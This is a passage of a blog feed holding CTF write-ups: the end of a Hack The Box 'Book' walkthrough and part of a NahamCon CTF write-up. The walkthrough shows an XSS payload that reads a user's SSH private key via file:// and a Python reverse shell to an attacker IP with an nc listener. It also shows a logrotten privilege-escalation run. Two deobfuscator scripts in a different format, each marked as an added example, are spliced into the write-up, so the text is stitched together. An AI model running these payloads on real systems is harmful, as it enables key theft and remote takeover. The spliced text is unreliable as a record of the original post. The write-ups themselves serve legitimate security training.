gnats:x:41:41:GnatsBug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd NetworkManagement,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemdResolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
reader:x:1000:1000:reader:/home/reader:/bin/bash
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
</code></pre></div></div>
<p>We can see there is a user called reader, so we can try to get the SSH key for this user by modifying our payload slightly.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o"><</span><span class="nx">script</span><span class="o">></span><span class="nx">x</span><span class="o">=</span><span class="k">new</span> <span class="nx">XMLHttpRequest</span><span class="p">;</span><span class="nx">x</span><span class="p">.</span><span class="nx">onload</span><span class="o">=</span><span class="kd">function</span><span class="p">(){</span><span class="nb">document</span><span class="p">.</span><span class="nx">write</span><span class="p">(</span><span class="k">this</span><span class="p">.</span><span class="nx">responseText</span><span class="p">)};</span><span class="nx">x</span><span class="p">.</span><span class="nx">open</span><span class="p">(</span><span class="dl">"</span><span class="s2">GET</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="s2">file:///home/reader/.ssh/id_rsa</span><span class="dl">"</span><span class="p">);</span><span class="nx">x</span><span class="p">.</span><span class="nx">send</span><span class="p">();</span><span class="o"><</span><span class="sr">/script</span><span class="err">>
</span></code></pre></div></div>
<p>After downloading the collections PDF again we get an SSH key:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>-----BEGIN RSA PRIVATE KEY-----
...
-----END RSA PRIVATE KEY-----
</code></pre></div></div>
<p>We can now SSH in as reader@10.10.10.176.</p>
<p>We find user.txt in the home folder.</p>
<p><img src="https://jdmce.com/assets/book/reader.jpg" alt="Reader" /></p>
<h3 id="priv-esc">Priv Esc</h3>
<p>I start by running linPEAS, which finds some interesting things.</p>
<p><img src="https://jdmce.com/assets/book/linpeas.jpg" alt="linpeas" /></p>
<p>We see that this machine is vulnerable to logrotate exploitation: we can write to the log files in the backups folder in reader’s home directory. Following the links from linPEAS we get an exploit that we can use, <a href="https://github.com/whotwagner/logrotten">Logrotten</a>.</p>
<p>We transfer this to the target machine using wget, then compile it:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reader@book:~ gcc <span class="nt">-o</span> logrotten logrotten.c
</code></pre></div></div>
<p>Then we need a payload; we can use a Python reverse shell from <a href="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet">pentestmonkey</a>.</p>
<div class="language-py highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">python</span> <span class="o">-</span><span class="n">c</span> <span class="s">'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.53",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span>
</code></pre></div></div>
<p>Then set up a listener on the attacking machine.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nc <span class="nt">-lvnp</span> 9001
</code></pre></div></div>
<p>Then execute the exploit:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reader@book:~ ./logrotten <span class="nt">-p</span> ./payloadfile /home/reader/backups/access.log
Waiting <span class="k">for </span>rotating backups/access.log...
</code></pre></div></div>
<p>If we now write random data to the log, it should trigger our payload.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">head</span> <span class="nt">-c</span> 10M < /dev/urandom <span class="o">></span> access.log
</code></pre></div></div>
<p>And we get a reverse shell!</p>
<p>I found the shell was very unstable so I had to quickly cat root.txt before the shell dropped.</p>
John McEwan
Book is a medium difficulty machine on Hack the Box. As always we begin by running an nmap scan.
Nahamcon CTF WriteUp
2020-06-15T20:34:30+01:00
2020-06-15T20:34:30+01:00
https://jdmce.com/ctf%20writeups/NahamCon-CTF-Writeup
<p><a href="https://ctf.nahamcon.com/">Nahamcon CTF</a> was an online CTF event held on June 12th-13th. Unfortunately I was only able to dedicate a few hours so I focused on the easier challenges.</p>
<h2 id="web">Web</h2>
<h3 id="agent-95">Agent 95</h3>
<ul>
<li>Clue: They’ve given you a number, and taken away your name~</li>
<li>Points: 50</li>
<li>Solves: 1788</li>
</ul>
<p>The Web page gives us the following message:</p>
<blockquote>
<p>You don’t look like our agent!
We will only give our flag to our Agent 95! He is still running an old version of Windows…</p>
</blockquote>
<p>I used BurpSuite to change the User-Agent to <code class="language-plaintext highlighter-rouge">Mozilla/4.0 (compatible; MSIE 4.0; Windows 95)</code>, which I got from <a href="http://useragentstring.com/pages/useragentstring.php?name=Internet+Explorer">useragentstring.com</a>. The response is the flag.</p>
<hr />
<h3 id="localghost">Localghost</h3>
<ul>
<li>Clue: BooOooOooOOoo! This spooOoOooky client-side cooOoOode sure is scary! What spoOoOoOoky secrets does he have in stooOoOoOore??</li>
<li>Points: 75</li>
<li>Solves: 1375</li>
</ul>
<p><img src="https://jdmce.com/assets/Nahamconctf/localghost.jpg" alt="Ascii Ghost" /></p>
<p>The web page has an ASCII art ghost which scrolls infinitely. By looking at the source code we find that the infinite scrolling is done by the JavaScript file /jquery.jscroll2.js.</p>
<p>The JavaScript is obfuscated:</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">var</span> <span class="nx">_0xbcec</span><span class="o">=</span><span class="p">[</span><span class="dl">"</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x20</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6A</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x3C</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x6D</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x3E</span><span class="se">\</span><span class="s2">x4C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x67</span><span 
class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x2E</span><span class="se">\</span><span class="s2">x3C</span><span class="se">\</span><span class="s2">x2F</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x6D</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x3E</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x3A</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">""</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x67</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x6B</span><span class="se">\</span><span class="s2">x4E</span><span class="se">\</span><span class="s2">x55</span><span class="se">\</span><span class="s2">x52</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x7A</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x47</span><span class="se">\</span><span class="s2">x39</span><span class="se">\</span><span class="s2">x76</span><span 
class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x39</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x5A</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x52</span><span class="se">\</span><span class="s2">x7A</span><span class="se">\</span><span class="s2">x58</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x58</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x4E</span><span class="se">\</span><span class="s2">x30</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x33</span><span class="se">\</span><span class="s2">x4A</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x5A</span><span class="se">\</span><span class="s2">x32</span><span class="se">\</span><span class="s2">x56</span><span class="se">\</span><span class="s2">x39</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x49</span><span class="se">\</span><span class="s2">x74</span><span 
class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6D</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x67</span><span class="se">\</span><span class="s2">x65</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x61</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x6E</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x75</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span 
class="s2">x74</span><span class="se">\</span><span class="s2">x73</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x78</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x64</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x77</span><span class="se">\</span><span class="s2">x2D</span><span class="se">\</span><span class="s2">x79</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x73</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x76</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x73</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x65</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span 
class="s2">x73</span><span class="se">\</span><span class="s2">x74</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x78</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x53</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x6C</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x63</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x72</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x66</span><span class="se">\</span><span class="s2">x69</span><span class="se">\</span><span class="s2">x6E</span><span class="se">\</span><span class="s2">x64</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x62</span><span class="se">\</span><span class="s2">x6F</span><span class="se">\</span><span class="s2">x64</span><span class="se">\</span><span class="s2">x79</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x68</span><span class="se">\</span><span class="s2">x72</span><span class="se">\</span><span class="s2">x65</span><span class="se">\</span><span class="s2">x66</span><span class="dl">"</span><span class="p">,</span><span class="dl">"</span><span class="se">\</span><span class="s2">x61</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x74</span><span class="se">\</span><span class="s2">x72</span><span class="dl">"</span><span class="p">,</span>
<span class="p">...</span>
</code></pre></div></div>
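A string table like this can be decoded offline, without loading the script in a browser or evaluating it. The following is an added example, not code from the original write-up or the challenge: SAMPLE_SOURCE is constructed from the first entries of the _0xbcec array shown above plus one constructed indexed call of the shape the de-obfuscated code reveals, and the helper names are my own.

```javascript
// Added example, not code from the original write-up: statically decode the
// string table of a script obfuscated like /jquery.jscroll2.js, with no
// browser and no eval. SAMPLE_SOURCE is constructed from the first entries of
// the _0xbcec array shown above plus one constructed indexed call of the shape
// the de-obfuscated code reveals (window.localStorage.setItem('flag', ...)).
const SAMPLE_SOURCE = String.raw`var _0xbcec=["\x75\x73\x65\x20\x73\x74\x72\x69\x63\x74","\x6A\x73\x63\x72\x6F\x6C\x6C","\x3C\x73\x6D\x61\x6C\x6C\x3E\x4C\x6F\x61\x64\x69\x6E\x67\x2E\x2E\x2E\x3C\x2F\x73\x6D\x61\x6C\x6C\x3E","\x61\x3A\x6C\x61\x73\x74","","\x66\x6C\x61\x67","\x53\x6B\x4E\x55\x52\x6E\x74\x7A\x63\x47\x39\x76\x62\x32\x39\x76\x61\x33\x6C\x66\x5A\x32\x68\x76\x63\x33\x52\x7A\x58\x32\x6C\x75\x58\x33\x4E\x30\x62\x33\x4A\x68\x5A\x32\x56\x39","\x73\x65\x74\x49\x74\x65\x6D","\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65","\x64\x61\x74\x61"];
window[_0xbcec[8]][_0xbcec[7]](_0xbcec[5],atob(_0xbcec[6]));`;

// Turn the escapes inside one string literal (\xNN, \uNNNN, \n, \", \\ ...)
// back into the characters they encode.
function decodeEscapes(literal) {
  const simple = { n: "\n", t: "\t", r: "\r", b: "\b", f: "\f", v: "\v", "0": "\0" };
  return literal.replace(/\\(x[0-9A-Fa-f]{2}|u[0-9A-Fa-f]{4}|[\s\S])/g, (_, esc) => {
    if (esc[0] === "x" || esc[0] === "u") return String.fromCharCode(parseInt(esc.slice(1), 16));
    return esc in simple ? simple[esc] : esc; // \\ \" \' map to themselves
  });
}

// Locate `var _0x....=[ ... ];`, return its name, the decoded entries and the
// offset at which the rest of the script starts.
function extractStringTable(source) {
  const m = /var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[([\s\S]*?)\]\s*;/.exec(source);
  if (!m) throw new Error("no obfuscator string table found");
  const table = [];
  for (const lit of m[2].matchAll(/"((?:[^"\\]|\\[\s\S])*)"|'((?:[^'\\]|\\[\s\S])*)'/g)) {
    table.push(decodeEscapes(lit[1] !== undefined ? lit[1] : lit[2]));
  }
  return { name: m[1], table, bodyStart: m.index + m[0].length };
}

// Entries that are well-formed base64 AND decode to printable ASCII are worth
// a look. "localStorage" passes the alphabet test but decodes to garbage, so
// the printable filter drops it.
function decodeBase64Entries(table) {
  const found = {};
  table.forEach((entry, i) => {
    if (entry.length % 4 !== 0 || !/^[A-Za-z0-9+/]{8,}={0,2}$/.test(entry)) return;
    const decoded = Buffer.from(entry, "base64").toString("latin1");
    if (/^[\x20-\x7E]+$/.test(decoded)) found[i] = decoded;
  });
  return found;
}

// Rewrite every _0xbcec[N] reference into the literal it stands for.
function resolveReferences(code, name, table) {
  const ref = new RegExp(name + "\\[(\\d+)\\]", "g");
  return code.replace(ref, (whole, idx) =>
    Number(idx) < table.length ? JSON.stringify(table[Number(idx)]) : whole);
}

// Full pass: decode the table, surface base64 entries and resolve references
// in the remainder of the script, so the setItem call reads like the
// beautified version.
function deobfuscate(source) {
  const { name, table, bodyStart } = extractStringTable(source);
  const base64 = decodeBase64Entries(table);
  const flag = Object.values(base64).find((s) => /\{.*\}/.test(s)) || null;
  const resolved = resolveReferences(source.slice(bodyStart).trim(), name, table);
  return { table, base64, resolved, flag };
}

const result = deobfuscate(SAMPLE_SOURCE);
console.log(result.resolved);
console.log("flag:", result.flag);
```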
<p>I used <a href="https://beautifier.io/">beautifier.io</a> to de-obfuscate the code.</p>
<div class="language-js highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">(</span><span class="kd">function</span><span class="p">(</span><span class="nx">_0xe943x1</span><span class="p">)</span> <span class="p">{</span>
<span class="dl">'</span><span class="s1">use strict</span><span class="dl">'</span><span class="p">;</span>
<span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span>
<span class="na">defaults</span><span class="p">:</span> <span class="p">{</span>
<span class="na">debug</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="na">autoTrigger</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span>
<span class="na">autoTriggerUntil</span><span class="p">:</span> <span class="kc">false</span><span class="p">,</span>
<span class="na">loadingHtml</span><span class="p">:</span> <span class="dl">'</span><span class="s1"><small>Loading...</small></span><span class="dl">'</span><span class="p">,</span>
<span class="na">padding</span><span class="p">:</span> <span class="mi">0</span><span class="p">,</span>
<span class="na">nextSelector</span><span class="p">:</span> <span class="dl">'</span><span class="s1">a:last</span><span class="dl">'</span><span class="p">,</span>
<span class="na">contentSelector</span><span class="p">:</span> <span class="dl">''</span><span class="p">,</span>
<span class="na">pagingSelector</span><span class="p">:</span> <span class="dl">''</span><span class="p">,</span>
<span class="na">callback</span><span class="p">:</span> <span class="kc">false</span>
<span class="p">}</span>
<span class="p">};</span>
<span class="nb">window</span><span class="p">[</span><span class="dl">'</span><span class="s1">localStorage</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">setItem</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">flag</span><span class="dl">'</span><span class="p">,</span> <span class="nx">atob</span><span class="p">(</span><span class="dl">'</span><span class="s1">SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9</span><span class="dl">'</span><span class="p">));</span>
<span class="kd">var</span> <span class="nx">_0xe943x2</span> <span class="o">=</span> <span class="kd">function</span><span class="p">(</span><span class="nx">_0xe943x3</span><span class="p">,</span> <span class="nx">_0xe943x4</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x5</span> <span class="o">=</span> <span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">data</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943x6</span> <span class="o">=</span> <span class="p">(</span><span class="k">typeof</span> <span class="nx">_0xe943x4</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">function</span><span class="dl">'</span><span class="p">)</span> <span class="p">?</span> <span class="p">{</span>
<span class="na">callback</span><span class="p">:</span> <span class="nx">_0xe943x4</span>
<span class="p">}</span> <span class="p">:</span> <span class="nx">_0xe943x4</span><span class="p">,</span>
<span class="nx">_0xe943x7</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">extend</span><span class="dl">'</span><span class="p">]({},</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">jscroll</span><span class="dl">'</span><span class="p">][</span><span class="dl">'</span><span class="s1">defaults</span><span class="dl">'</span><span class="p">],</span> <span class="nx">_0xe943x6</span><span class="p">,</span> <span class="nx">_0xe943x5</span> <span class="o">||</span> <span class="p">{}),</span>
<span class="nx">_0xe943x8</span> <span class="o">=</span> <span class="p">(</span><span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">css</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">overflow-y</span><span class="dl">'</span><span class="p">)</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">visible</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943x9</span> <span class="o">=</span> <span class="nx">_0xe943x3</span><span class="p">[</span><span class="dl">'</span><span class="s1">find</span><span class="dl">'</span><span class="p">](</span><span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">nextSelector</span><span class="dl">'</span><span class="p">])[</span><span class="dl">'</span><span class="s1">first</span><span class="dl">'</span><span class="p">](),</span>
<span class="nx">_0xe943xa</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="nb">window</span><span class="p">),</span>
<span class="nx">_0xe943xb</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="dl">'</span><span class="s1">body</span><span class="dl">'</span><span class="p">),</span>
<span class="nx">_0xe943xc</span> <span class="o">=</span> <span class="nx">_0xe943x8</span> <span class="p">?</span> <span class="nx">_0xe943xa</span> <span class="p">:</span> <span class="nx">_0xe943x3</span><span class="p">,</span>
<span class="nx">_0xe943xd</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">[</span><span class="dl">'</span><span class="s1">trim</span><span class="dl">'</span><span class="p">](</span><span class="nx">_0xe943x9</span><span class="p">[</span><span class="dl">'</span><span class="s1">attr</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">href</span><span class="dl">'</span><span class="p">)</span> <span class="o">+</span> <span class="dl">'</span><span class="s1"> </span><span class="dl">'</span> <span class="o">+</span> <span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">contentSelector</span><span class="dl">'</span><span class="p">]),</span>
<span class="nx">_0xe943xe</span> <span class="o">=</span> <span class="kd">function</span><span class="p">()</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x17</span> <span class="o">=</span> <span class="nx">_0xe943x1</span><span class="p">(</span><span class="nx">_0xe943x7</span><span class="p">[</span><span class="dl">'</span><span class="s1">loadingHtml</span><span class="dl">'</span><span class="p">])[</span><span class="dl">'</span><span class="s1">filter</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">img</span><span class="dl">'</span><span class="p">)[</span><span class="dl">'</span><span class="s1">attr</span><span class="dl">'</span><span class="p">](</span><span class="dl">'</span><span class="s1">src</span><span class="dl">'</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="nx">_0xe943x17</span><span class="p">)</span> <span class="p">{</span>
<span class="kd">var</span> <span class="nx">_0xe943x18</span> <span class="o">=</span> <span class="k">new</span> <span class="nx">Image</span><span class="p">();</span>
<span class="nx">_0xe943x18</span><span class="p">[</span><span class="dl">'</span><span class="s1">src</span><span class="dl">'</span><span class="p">]</span> <span class="o">=</span> <span class="nx">_0xe943x17</span>
<span class="p">}</span>
<span class="p">},</span>
<span class="p">...</span>
</code></pre></div></div>
<p>The code sets the localStorage item “flag” to the string <code class="language-plaintext highlighter-rouge">SkNURntzcG9vb29va3lfZ2hvc3RzX2luX3N0b3JhZ2V9</code>; base64-decoding this string gives us the flag.</p>
<p>Another way to solve this challenge is simply to use Chrome dev tools, where the flag can be read from Local Storage.</p>
<p class="full"><img src="https://jdmce.com/assets/Nahamconctf/localflag.jpg" alt="Local Ghost" /></p>
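<p>As an added example (not the challenge's file or the writeup's code), the following Python script reverses the string-table obfuscation seen in jquery.jscroll2.js: it decodes the \xNN-escaped array, substitutes the <code class="language-plaintext highlighter-rouge">_0xbcec[N]</code> references back into the code, and base64-decodes whatever is passed to atob(). The input is a constructed snippet in the same style that reuses the real base64 string from the challenge.</p>

```python
#!/usr/bin/env python3
"""Undo JavaScript string-table obfuscation and decode atob() payloads (added example)."""
import base64
import re

# Constructed sample in the style of the challenge's jquery.jscroll2.js: a table of
# \xNN-escaped strings followed by code that indexes into it. The last table entry
# is the base64 string from the real challenge file.
SAMPLE_JS = (
    r'var _0xbcec=["\x66\x6C\x61\x67","\x73\x65\x74\x49\x74\x65\x6D",'
    r'"\x6C\x6F\x63\x61\x6C\x53\x74\x6F\x72\x61\x67\x65",'
    r'"\x53\x6B\x4E\x55\x52\x6E\x74\x7A\x63\x47\x39\x76\x62\x32\x39\x76\x61\x33\x6C'
    r'\x66\x5A\x32\x68\x76\x63\x33\x52\x7A\x58\x32\x6C\x75\x58\x33\x4E\x30\x62\x33\x4A'
    r'\x68\x5A\x32\x56\x39"];'
    "\n"
    "window[_0xbcec[2]][_0xbcec[1]](_0xbcec[0],atob(_0xbcec[3]));"
)

TABLE_RE = re.compile(r'var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[(.*?)\];', re.DOTALL)
HEX_RE = re.compile(r'\\x([0-9a-fA-F]{2})')


def unescape_js(literal):
    """Turn the body of a JS string literal made of \\xNN escapes into plain text."""
    return HEX_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)


def parse_string_table(js):
    """Return (table_name, [decoded strings]) from the 'var _0x...=[...]' statement."""
    m = TABLE_RE.search(js)
    if not m:
        raise ValueError("no string table found")
    name, body = m.group(1), m.group(2)
    # entries are double-quoted JS strings; escapes mean no raw quote can appear inside
    entries = re.findall(r'"((?:[^"\\]|\\.)*)"', body)
    return name, [unescape_js(e) for e in entries]


def deobfuscate(js):
    """Replace every table[N] reference in the code after the table with its literal."""
    name, table = parse_string_table(js)
    body = js[TABLE_RE.search(js).end():].lstrip("\n")
    ref = re.compile(re.escape(name) + r'\[(\d+)\]')

    def repl(m):
        s = table[int(m.group(1))].replace("\\", "\\\\").replace("'", "\\'")
        return "'" + s + "'"

    return ref.sub(repl, body)


def atob_payloads(js):
    """Decode every atob('...') argument, i.e. what the browser would store."""
    out = []
    for b64 in re.findall(r"atob\('([A-Za-z0-9+/=]+)'\)", js):
        out.append(base64.b64decode(b64).decode("utf-8", errors="replace"))
    return out


if __name__ == "__main__":
    clean = deobfuscate(SAMPLE_JS)
    print(clean)
    for payload in atob_payloads(clean):
        print("atob payload:", payload)
```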
<hr />
<h3 id="phphonebook">PhphoneBook</h3>
<ul>
<li>Clue: Ring ring! Need to look up a number? This phonebook has got you covered! But you will only get a flag if it is an emergency!</li>
<li>Points: 100</li>
<li>Solves: 561</li>
</ul>
<p>The web page gives us the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Sorry! You are in /index.php/?file=
The phonebook is located at phphonebook.php
</code></pre></div></div>
<p>I first tried going directly to phphonebook.php and got the following page:</p>
<p><img src="https://jdmce.com/assets/Nahamconctf/phonebook.jpg" alt="phphonebook" /></p>
<p>I then tried going to /index.php/?file=phphonebook.php and got the same page. I realised quickly that it was a local file inclusion, but spent too long trying to look for other files, like a flag.php, which doesn’t exist.</p>
<p>Eventually I remembered that I could get the contents of phphonebook.php by reading it through the php://filter wrapper, which returns the source base64-encoded.</p>
